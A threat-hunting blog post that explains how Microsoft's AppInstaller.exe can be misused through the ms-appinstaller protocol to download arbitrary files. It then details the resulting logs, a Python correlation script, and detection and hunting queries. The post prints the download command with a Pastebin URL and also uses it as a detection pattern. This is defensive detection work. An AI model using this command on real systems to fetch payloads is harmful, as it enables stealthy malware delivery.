Effective URL: https://detect.fyi/lolbas-detection-serie-1-appinstaller-exe-96971b9b1793?gi=515b3cbc3ee1
LOLBAS DETECTION SERIE [1] - APPINSTALLER.EXE
mthcht · Published in Detect FYI · 6 min read · Aug 21, 2023

The LOLBAS series: https://mthcht.medium.com/list/lolbas-843ba9de6810

WHAT IS APPINSTALLER?

AppInstaller is a utility that installs APPX and MSIX packages. It is used by many software vendors and plays a key role in software management.

WHAT IS LOLBAS?

Living Off The Land Binaries and Scripts. The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques.

Living Off The Land techniques refer to a set of tactics used by attackers to exploit legitimate tools and processes already present on a system. By using these built-in tools and features, they can carry out malicious activities undetected, blending in with legitimate traffic.

For the LOLBAS project a LOLBin/Lib/Script must:
* Be a Microsoft-signed file, either native to the OS or downloaded from Microsoft.
* Have extra “unexpected” functionality.
* Have functionality that would be useful to an APT or red team.

LOL TECHNIQUE FOR APPINSTALLER.EXE

Ref LOLBAS: https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/

notwhickey on Twitter found a way to download arbitrary files with AppInstaller.exe by using the following command:

start ms-appinstaller://?source=<url>

Using ‘?source=<url>’, even if the targeted file is not recognized as a valid package, it will still be downloaded to the system!

Categorized: T1105: Ingress Tool Transfer

TESTING AND DETECTION

Important Note: I have tried with multiple versions of Windows, and it will not work on an updated system.
This is because the ms-appinstaller protocol has been disabled by Microsoft since it was abused by malware, Emotet being one of them: https://www.bleepingcomputer.com/news/security/emotet-now-spreads-via-fake-adobe-windows-app-installer-packages/

I tested it on this Windows 10 Build version and it worked for me:

Let’s test the command suggested on the LOLBAS page:

start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw

This is the message shown by AppInstaller after execution (Invalid file format):

WHAT IS HAPPENING BEHIND THE SCENES?

With Procmon running in the background, we can see these file creations:

Both AppInstaller.exe and taskhostw.exe created text files named after our file in the Pastebin URL, ‘tdyShwLw[1].txt’, in the directory ‘C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\InetCache\<RANDOM-8-CHAR-DIRECTORY>’. This behavior is consistent with what’s suggested on the LOLBAS page.

Additionally, an interesting file named ‘AILog.txt’ is created by AppInstaller.exe in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\TempState\

* Content of tdyShwLw[1].txt:

We find the string calc.exe in our text file, which corresponds to the content of the Pastebin link we attempted to download (https://pastebin.com/raw/tdyShwLw). Thus, even if the system doesn’t recognize the targeted file as a valid format, it will still download it to the system!
* Content of AILog.txt (C:\Users\admin\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\TempState\AILog.txt):

[Mon Aug 21 17:17:25 2023] Log File is located under: C:\Users\admin\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\TempState\AILog.txt
[Mon Aug 21 17:17:25 2023]{6064} ConvertVersionToUINT64(String) -> Version [2814750835277824]
[Mon Aug 21 17:17:25 2023]{6064} ConvertVersionToUINT64(String) -> Version [2814750835343360]
[Mon Aug 21 17:17:25 2023]{6064} ConvertVersionToUINT64(String) -> Version [2814750890000384]
[Mon Aug 21 17:17:25 2023]{6064} ConvertVersionToUINT64(String) -> Version [2814750890065920]
[Mon Aug 21 17:17:25 2023]{6064} ConvertVersionToUINT64(String) -> Version [2814750931222528]
[Mon Aug 21 17:17:25 2023]{6064} ConvertVersionToUINT64(String) -> Version [2814750931288064]
[Mon Aug 21 17:17:25 2023]{6064} ConvertVersionToUINT64(String) -> Version [2814751004164096]
[Mon Aug 21 17:17:25 2023]{6064} App::OnActivated: Activated via other means (protocol/protocol for results/toast notification)
[Mon Aug 21 17:17:25 2023]{6064} Activated with Protocol contract.
[Mon Aug 21 17:17:25 2023]{6064} Argument is a Uri: [ms-appinstaller:///?source=https://pastebin.com/raw/tdyShwLw]
[Mon Aug 21 17:17:25 2023]{6064} AppInstallerUri constructor, URI: [ms-appinstaller:///?source=https://pastebin.com/raw/tdyShwLw]
[Mon Aug 21 17:17:25 2023]{6064} Parsed AppInstaller URI: source: [https://pastebin.com/raw/tdyShwLw], activationUri: [N/A], checkForUdpates: [N/A]
[Mon Aug 21 17:17:25 2023]{6064} Setting launch intent to MSAPPINSTALLER_INSTALL
[Mon Aug 21 17:17:25 2023]{6064} RegisterBackgroundTask -> Checking if Toast Notification Background Task is already registered.
[Mon Aug 21 17:17:25 2023]{6064} RegisterBackgroundTask -> Toast Notification Background Task is already registered.
[Mon Aug 21 17:17:25 2023]{6064} RegisterBackgroundTask -> Checking if Installation Background Task is already registered.
[Mon Aug 21 17:17:25 2023]{6064} RegisterBackgroundTask -> Installation Background Task is already registered.
[Mon Aug 21 17:17:25 2023]{6064} GoToState -> WindowButtonsPresentState
[Mon Aug 21 17:17:25 2023]{6064} GoToState -> LoadingState
[Mon Aug 21 17:17:25 2023]{6064} GetIsMSIXExtensionSupported -> True
[Mon Aug 21 17:17:25 2023]{6064} GetIsMSIXBundleExtensionSupported -> True
[Mon Aug 21 17:17:25 2023]{6064} AppInstallerUri constructor, URI: [ms-appinstaller:///?source=https://pastebin.com/raw/tdyShwLw]
[Mon Aug 21 17:17:25 2023]{6064} Parsed AppInstaller URI: source: [https://pastebin.com/raw/tdyShwLw], activationUri: [N/A], checkForUdpates: [N/A]
[Mon Aug 21 17:17:25 2023]{6064} AppsInfo->CreateAsync, URI: [https://pastebin.com/raw/tdyShwLw]
[Mon Aug 21 17:17:25 2023]{6064} AppsInfo, File Type: [Package]
[Mon Aug 21 17:17:25 2023]{6064} AppDataSource::CreateAsync
[Mon Aug 21 17:17:25 2023]{6064} AppInstallerUri constructor, URI: [ms-appinstaller:///?source=https://pastebin.com/raw/tdyShwLw]
[Mon Aug 21 17:17:26 2023]{6064} Parsed AppInstaller URI: source: [https://pastebin.com/raw/tdyShwLw], activationUri: [N/A], checkForUdpates: [N/A]
[Mon Aug 21 17:17:26 2023]{6064} AppPackageInfo::CreateAsync -> Populating package info
[Mon Aug 21 17:17:26 2023]{6064} ERROR: AppsInfo -> Error: [0x8051100f]
[Mon Aug 21 17:17:26 2023]{6064} AppsInfo, File Type: [Bundle]
[Mon Aug 21 17:17:26 2023]{6064} AppDataSource::CreateAsync
[Mon Aug 21 17:17:26 2023]{6064} AppInstallerUri constructor, URI: [ms-appinstaller:///?source=https://pastebin.com/raw/tdyShwLw]
[Mon Aug 21 17:17:26 2023]{6064} Parsed AppInstaller URI: source: [https://pastebin.com/raw/tdyShwLw], activationUri: [N/A], checkForUdpates: [N/A]
[Mon Aug 21 17:17:26 2023]{6064} AppPackageInfo::CreateAsync -> Populating bundle info
[Mon Aug 21 17:17:26 2023]{6064} ERROR: AppsInfo -> Error: [0x8051100f]
[Mon Aug 21 17:17:26 2023]{6064} AppsInfo, File Type: [AppInstaller]
[Mon Aug 21 17:17:26 2023]{6064} AppDataSource::CreateAsync
[Mon Aug 21 17:17:26 2023]{6064} AppInstaller XML content: calc.exe
[Mon Aug 21 17:17:26 2023]{6064} AppInstallerExtension::LoadXmlFromSourceAsync -> Error: 0xc00ce556
[Mon Aug 21 17:17:26 2023]{6064} ERROR: AppsInfo -> Error: [0x80073aa0]
[Mon Aug 21 17:17:26 2023]{6064} AppInstallerException -> Error Resource ID: [invalidFile]
[Mon Aug 21 17:17:26 2023]{6064} GoToState -> LoadedState
[Mon Aug 21 17:17:26 2023]{6064} GoToState -> DisplayAppsInfoErrorState

This is a nice DFIR artefact that can be collected to detect the usage of this LOLBin: the full URL argument, https://pastebin.com/raw/tdyShwLw, is recorded in this log!

With Sysmon Event ID 22 I can see AppInstaller.exe making a DNS request to pastebin.com:

Log Name: Microsoft-Windows-Sysmon/Operational
Source: Microsoft-Windows-Sysmon
Date: 8/21/2023 5:17:25 PM
Event ID: 22
Task Category: Dns query (rule: DnsQuery)
Level: Information
Keywords:
User: Système
Computer: DESKTOP-GI9JDDB
Description:
Dns query:
RuleName:
UtcTime: 2023-08-21 17:17:25.056
ProcessGuid: {ba956c93-8574-64e3-0000-00105a40cb00}
ProcessId: 5276
QueryName: pastebin.com
QueryStatus: 0
QueryResults: ::ffff:104.20.68.143;::ffff:104.20.67.143;::ffff:172.67.34.170;
Image: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.32912.0_x64__8wekyb3d8bbwe\AppInstaller.exe

Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" />
    <EventID>22</EventID>
    <Version>5</Version>
    <Level>4</Level>
    <Task>22</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8000000000000000</Keywords>
    <TimeCreated SystemTime="2023-08-21T17:17:25.008082800Z" />
    <EventRecordID>1478857</EventRecordID>
    <Correlation />
    <Execution ProcessID="2684" ThreadID="3788" />
    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
    <Computer>DESKTOP-GI9JDDB</Computer>
    <Security UserID="S-1-5-18" />
  </System>
  <EventData>
    <Data Name="RuleName"> </Data>
    <Data Name="UtcTime">2023-08-21 17:17:25.056</Data>
    <Data Name="ProcessGuid">{ba956c93-8574-64e3-0000-00105a40cb00}</Data>
    <Data Name="ProcessId">5276</Data>
    <Data Name="QueryName">pastebin.com</Data>
    <Data Name="QueryStatus">0</Data>
    <Data Name="QueryResults">::ffff:104.20.68.143;::ffff:104.20.67.143;::ffff:172.67.34.170;</Data>
    <Data Name="Image">C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.32912.0_x64__8wekyb3d8bbwe\AppInstaller.exe</Data>
  </EventData>
</Event>

What is unexpected is that I cannot see the command line in process execution logs (Event IDs 1, 3, 4688…):

start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw

I am not sure why it’s not logged; it seems to be a specific behavior of protocol handlers…

But since the ms-appinstaller protocol has been disabled by Microsoft 2 years ago, for the detection we can rely on the Sigma rule proposed in the LOLBAS project: AppInstaller.exe making a DNS query. To get the full URL requested, we should see the URL in our proxy logs, or we can collect the log file *:\Users\*\AppData\Local\Packages\Microsoft.DesktopAppInstaller_*\TempState\AILog.txt from the endpoints!
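The two artifacts above, the AILog.txt lines and the Sysmon Event ID 22 record, can be parsed and correlated mechanically. The following Python is an added example written for this section; it is not code from the original article, the LOLBAS project or Microsoft. It extracts the `source` URL and the error resource ID from AILog.txt, flattens a Sysmon DNS event into its `Image` and `QueryName` fields, flags AppInstaller.exe DNS queries the way the LOLBAS Sigma rule does (the `APPINSTALLER_IMAGE` regex mirrors the wildcarded `process_path` used in the hunting search below), and links the two artifacts by host name. The sample log and event are constructed, shortened copies of the excerpts shown above; the list of package extensions used to flag a `source` URL that does not look like a package is my assumption, drawn from the Package, Bundle and AppInstaller file types the log tries in turn.

```python
"""Added example (not part of the original post): parse AppInstaller's AILog.txt
and a Sysmon Event ID 22 record, then correlate the two."""
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed sample, shortened from the AILog.txt excerpt in the post.
SAMPLE_AILOG = r"""[Mon Aug 21 17:17:25 2023] Log File is located under: C:\Users\admin\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\TempState\AILog.txt
[Mon Aug 21 17:17:25 2023]{6064} Activated with Protocol contract.
[Mon Aug 21 17:17:25 2023]{6064} Argument is a Uri: [ms-appinstaller:///?source=https://pastebin.com/raw/tdyShwLw]
[Mon Aug 21 17:17:25 2023]{6064} Parsed AppInstaller URI: source: [https://pastebin.com/raw/tdyShwLw], activationUri: [N/A], checkForUdpates: [N/A]
[Mon Aug 21 17:17:26 2023]{6064} Parsed AppInstaller URI: source: [https://pastebin.com/raw/tdyShwLw], activationUri: [N/A], checkForUdpates: [N/A]
[Mon Aug 21 17:17:26 2023]{6064} AppInstaller XML content: calc.exe
[Mon Aug 21 17:17:26 2023]{6064} AppInstallerException -> Error Resource ID: [invalidFile]
"""

# Constructed sample, shortened from the Sysmon Event ID 22 XML in the post.
SAMPLE_SYSMON_22 = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Sysmon" /><EventID>22</EventID>
    <Computer>DESKTOP-GI9JDDB</Computer></System>
  <EventData>
    <Data Name="UtcTime">2023-08-21 17:17:25.056</Data>
    <Data Name="ProcessId">5276</Data>
    <Data Name="QueryName">pastebin.com</Data>
    <Data Name="Image">C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.32912.0_x64__8wekyb3d8bbwe\AppInstaller.exe</Data>
  </EventData>
</Event>"""

# One AILog.txt line: "[timestamp]{thread id} message"; the first line has no thread id.
AILOG_LINE = re.compile(r"^\[(?P<ts>[^\]]+)\]\{(?P<tid>\d+)\}\s*(?P<msg>.*)$")
SOURCE_RE = re.compile(r"Parsed AppInstaller URI: source: \[(?P<url>[^\]]*)\]")
ERROR_RE = re.compile(r"Error Resource ID: \[(?P<id>[^\]]*)\]")

# Packaged AppInstaller binary, version directory wildcarded
# (same shape as the process_path pattern in the hunting search).
APPINSTALLER_IMAGE = re.compile(
    r"^[A-Za-z]:\\Program Files\\WindowsApps\\Microsoft\.DesktopAppInstaller_[^\\]+\\AppInstaller\.exe$",
    re.IGNORECASE,
)

# Assumed list of extensions a genuine "source" would normally carry; the log
# tries the Package, Bundle and AppInstaller parsers in turn before giving up.
PACKAGE_EXTENSIONS = (".msix", ".msixbundle", ".appx", ".appxbundle", ".appinstaller")


def extract_sources(ailog_text):
    """Unique 'source' URLs found in AILog.txt, in order of first appearance."""
    seen = []
    for line in ailog_text.splitlines():
        m = AILOG_LINE.match(line)
        if not m:
            continue
        s = SOURCE_RE.search(m.group("msg"))
        if s and s.group("url") not in seen:
            seen.append(s.group("url"))
    return seen


def extract_errors(ailog_text):
    """Error resource IDs (e.g. invalidFile) logged by AppInstaller."""
    return [e.group("id") for line in ailog_text.splitlines()
            for e in [ERROR_RE.search(line)] if e]


def parse_sysmon_event(xml_text):
    """Flatten a Sysmon event into {'EventID': int, '<Data Name>': str, ...}."""
    root = ET.fromstring(xml_text)
    fields = {}
    for el in root.iter():
        tag = el.tag.split("}", 1)[-1]  # drop the xmlns prefix
        if tag == "EventID":
            fields["EventID"] = int(el.text)
        elif tag == "Data" and el.get("Name"):
            fields[el.get("Name")] = (el.text or "").strip()
    return fields


def is_appinstaller_dns_query(fields):
    """Logic of the LOLBAS Sigma rule: AppInstaller.exe issuing a DNS query."""
    return fields.get("EventID") == 22 and bool(APPINSTALLER_IMAGE.match(fields.get("Image", "")))


def has_package_extension(url):
    """True when the source URL path ends in a known package extension."""
    return urlparse(url).path.lower().endswith(PACKAGE_EXTENSIONS)


def correlate(sources, fields):
    """Source URLs from AILog.txt whose host is the QueryName of the DNS event."""
    qname = fields.get("QueryName", "").lower()
    return [u for u in sources if (urlparse(u).hostname or "").lower() == qname]


def triage(ailog_text, sysmon_xml):
    """Combine both artifacts into one finding."""
    sources = extract_sources(ailog_text)
    fields = parse_sysmon_event(sysmon_xml)
    flagged = is_appinstaller_dns_query(fields)
    return {
        "appinstaller_dns_query": flagged,
        "sources": sources,
        "non_package_sources": [u for u in sources if not has_package_extension(u)],
        "errors": extract_errors(ailog_text),
        "matched_sources": correlate(sources, fields) if flagged else [],
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_AILOG, SAMPLE_SYSMON_22).items():
        print(f"{key}: {value}")
```

On a real endpoint the AILog.txt text would come from the `TempState` path given above and the XML from the Sysmon channel export; the DNS event alone tells you that AppInstaller.exe resolved a host, and only the AILog.txt `source` line gives the full URL, which is why the two are worth joining.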
For this example using Pastebin for data collection, I recommend these detection patterns for Pastebin requests in your proxy logs (ref):

Raw content access with pastebin in the field url:
* http*//pastebin.com*/raw/*
* http*//pastebin.com*/rw/*

More details on Pastebin detections: https://detect.fyi/how-threat-actors-use-pastebin-69a78c149ccf

RELEVANT HUNTING SEARCHES:

DNS Queries (to correlate with the logs from AILog.txt):

`mysysmonlogs` process_path="C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_*\\AppInstaller.exe" signature_id=22

Now for the command line (even if I did not see it): it could be in a script or combined with other commands and logged in process execution:

(`scriptcontentblocklogs` OR (`mysysmonlogs` signature_id=1)) process_command="*start ms-appinstaller://?source=http*" OR scriptcontent="*start ms-appinstaller://?source=http*"

Lookup Table entries: (change with your own field mapping)

Moving on to the next LOLBAS!
Tags: Threat Hunting, Detection Engineering, Cybersecurity, Lolbin, Appinstaller

Written by mthcht · Writer for Detect FYI · Threat Hunting - DFIR - Detection Engineering · https://twitter.com/mthcht